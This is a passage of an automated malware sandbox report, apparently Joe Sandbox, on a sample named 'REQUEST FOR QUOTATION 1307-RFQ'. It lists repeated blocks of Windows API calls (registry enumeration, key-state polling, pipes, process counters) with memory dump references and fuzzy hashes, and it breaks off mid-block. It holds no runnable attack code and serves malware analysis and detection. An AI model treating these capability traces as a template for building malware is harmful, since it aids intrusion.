                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                                              • String ID: nul
                                                                                                                                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                                                                                                                                              • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                                                                                              • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0046ACC1
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                                                                              • API String ID: 3164766367-685833217
                                                                                                                                                                                                                              • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                                                                                                                                                              • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                                                                                                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                              • String ID: @F
                                                                                                                                                                                                                              • API String ID: 2875609808-2781531706
                                                                                                                                                                                                                              • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                                                                                              • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B23F73,00000003,?,00B23F13,00000003,00B3DE80,0000000C,00B2403D,00000003,00000002), ref: 00B23FE2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B23FF5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00B23F73,00000003,?,00B23F13,00000003,00B3DE80,0000000C,00B2403D,00000003,00000002,00000000), ref: 00B24018
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 2218c7597f5b656a91625915cd25f083898f318cbf87c382510bcf3c8184ac70
                                                                                                                                                                                                                              • Instruction ID: f1e41fc5a36150cfcd38d017da25f01abbacfe031a9a9283eb1a4400c8940bae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2218c7597f5b656a91625915cd25f083898f318cbf87c382510bcf3c8184ac70
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F04F70A50228BBCB219F94EC09BAEBFF5EB04752F1000A4F909B3160DF759A95DA91
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                                                                                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2364364464-0
                                                                                                                                                                                                                              • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                                                                                                                                                              • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3440857362-0
                                                                                                                                                                                                                              • Opcode ID: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                                                                                                                                                                                                                              • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1389676194-0
                                                                                                                                                                                                                              • Opcode ID: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                                                                                                                                                                                                                              • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                                                                                              • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                                                                                              • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4210589936-0
                                                                                                                                                                                                                              • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                                                                                              • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0045645C
                                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00456466
                                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2108273632-0
                                                                                                                                                                                                                              • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                                                                                              • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3382505437-0
                                                                                                                                                                                                                              • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                                                                                              • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                                                                                                                                                              • _wcsstr.LIBCMT ref: 0045B289
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3902887630-0
                                                                                                                                                                                                                              • Opcode ID: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
